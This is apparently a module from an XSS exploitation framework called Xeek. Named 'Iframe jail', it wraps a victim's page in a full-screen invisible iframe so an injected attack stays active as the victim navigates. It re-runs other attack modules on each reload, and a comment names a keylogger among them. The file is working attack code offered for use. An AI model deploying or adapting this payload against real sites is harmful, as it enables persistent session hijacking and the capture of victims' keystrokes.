/*
 * Name: Iframe jail
 * Description: Wrap the current page into an iframe to keep the session open even if the victim clicks on a link.
 * Author: Emilien Girault
 * Version: 1.0
 *
 * Parameters: 
 *  - url: The page to display in the iframe.
 *      Optional: NO
 *  - title: The title of the page.
 *      Optional: YES
 *      Default value: 
 */
CREATE_XEEK_EXPLOIT({

  //Additional handlers to call at load time. Other module can add their own handlers using addHandler().
  handlers: new Array(),

  run: function(token, params) {
  
    //Create the iframe
    var iframe = document.createElement('iframe');
    
    //Handler called each time the iframe is reloaded
    var iframe_load = function (e){
      var target, handlers;
      
      //Get the title (compatibility with IE)
      if (!e) var e = window.event; //IE
      if (e.target) target = e.target;
      else if (e.srcElement) target = e.srcElement; //IE
      
      //Set the title
      document.title = (params["title"] && params["title"] != "") ? params["title"] : target.doc().title;
      
      //If the dumb keylogger is running, run it in the iframe
      handlers = THIS_XEEK_EXPLOIT().handlers;
      for(var i = 0; i < handlers.length; i++){
        handlers[i]();
      }
    }

    //Set the target of the iframe
    var src = params["url"];

    //Add a random param to prevent bugs on some browsers
    var i = src.indexOf("://");
    var b = i == -1 ? src : src.substring(i+3, src.length);
    if(b.indexOf("/") == -1){
      src += "/?";
    } else if(b.indexOf("?") == -1){
      src += "?";
    } else {
      src += "&";
    }
    src += "_xeek="+Math.random();
    iframe.src = src;

    //Set the position
    iframe.style.position = "absolute";
    iframe.style.top = "0px";
    iframe.style.left = "0px";
    
    //Set the size
    if(/MSIE 6/i.test(navigator.userAgent)){
      iframe.width = document.body.offsetWidth+30; //for the right scrollbar
      iframe.height = document.body.offsetHeight;
    } else {
      iframe.style.width = "100%";
      iframe.style.height = "100%";
    }
    
    //Set the overflow property
    iframe.style.overflow = document.body.style.overflow;
    document.body.style.overflow = "hidden";
    document.getElementsByTagName('html')[0].style.overflow = "hidden"; //IE7 fix
    
    //Set the border
    iframe.style.border = "none"; //doesn't work with IE7
    iframe.style.background = "white";
    iframe.frameBorder = 0;

    scrollTo(0,0);

    document.body.style.marginLeft = 0;
    document.body.style.marginRight = 0;
    
    //Put the iframe on top of all elements
    iframe.style.zIndex="10000";
    
    //Set the refresh handler
    XeekAgent.Helpers.addEvent(iframe, 'load', iframe_load);

    //Set the generic 'doc' property, referring to its content document
    iframe.doc = function() {
      if(this.contentDocument){
        // Firefox, Opera
        return this.contentDocument;
      } else if(this.contentWindow) {
        // Internet Explorer
        return this.contentWindow.document;
      } else if(this.document) {
        // Others?
        return this.document;
      }
    }
    
    this.iframe_jail = iframe;
    
    //Add the iframe to the body and save a reference to it
    document.body.appendChild(iframe);
    
  },
  
  /**
   * Add a handler to the iframe. it will be called right now, as well as each time the iframe is reloaded.
   */
  addHandler : function(handler) {
    //If the iframe is currently running, run the handler now
    if(this.iframe_jail) {
      //Add it right now
      handler();
    }
    
    //Add the handler in order to run it each time the iframe is reloaded
    this.handlers.push(handler); 
  }

});
